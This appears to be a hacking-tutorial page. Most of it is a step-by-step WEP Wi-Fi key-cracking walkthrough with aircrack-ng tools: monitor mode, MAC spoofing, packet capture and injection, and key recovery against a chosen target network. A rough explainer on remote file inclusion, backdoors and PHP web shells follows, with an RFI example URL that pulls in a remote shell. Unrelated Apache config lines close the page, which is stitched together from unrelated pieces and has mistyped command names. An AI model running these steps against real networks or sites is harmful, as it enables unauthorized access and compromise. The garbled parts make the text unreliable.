Special Security

Requirements:

* Backtrack 3 on CD or USB
* Computer with compatible 802.11 wireless card
* Wireless Access point or WIFI Router using WEP encryption

I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:
Preparing The WIFI Card

First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:

iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]
Then:

ifconfig down [interface]
Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:

airmon-ng start [device]
airmon-ngstart1.png
Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]
airodumpwifi0.png

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

airodumpoutput.png

The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
aireplayfakeauth.png

If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplaygenerateivs.png

This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.

captureivs_0.png

After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
aireplayattack2p.png

Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.

crackng.png

Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.

You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks

about remote file inclusion |RFI|

remote file inclusion is where you include a remote file..usaully the file you include will be for malicious purposes

backdoors

what is a backdoor

well your house has a front door...that usually is supposed to be welcoming
a backdoor doesnt look welcoming because people arent usually supposed to use it

a computer backdoor is a code/script that runs on a system with stealth
it allows hackers secret access to the affected system if it is setup up correctly
a backdoor usualy runs as a hidden proccess and will open various port and accept commands for the hacker that is using it

shell

what is a shell

there are many forms of shells..we will not be talking about sea shells today though
a shell on a system is a session/terminal that takes commands etc..like a mini command center
shells can be in php,java,c and other various languages

today i will explain a php shell is

a php shell is a script in php designed to take user inputted commands and browse files,execute commands,edit files,upload files,like a files manager
a php shell is executed via your web browser
eg...www.sites.com/shell.php?
the php shell gives you the same sort of access as if you were at that machine on the same account it is executed on..



remote file inclusion happens usually when someone make a php script and doesnt code it so that the script sanitizes the users input and there are no restrictions running on the server hosting the website with the vulnerable page

a vulnerable page's source code may have this in it

site.com/index.php?page=http://site.com/shell.txt?

AddType application/octect-stream pdf

AddType text/plain pdf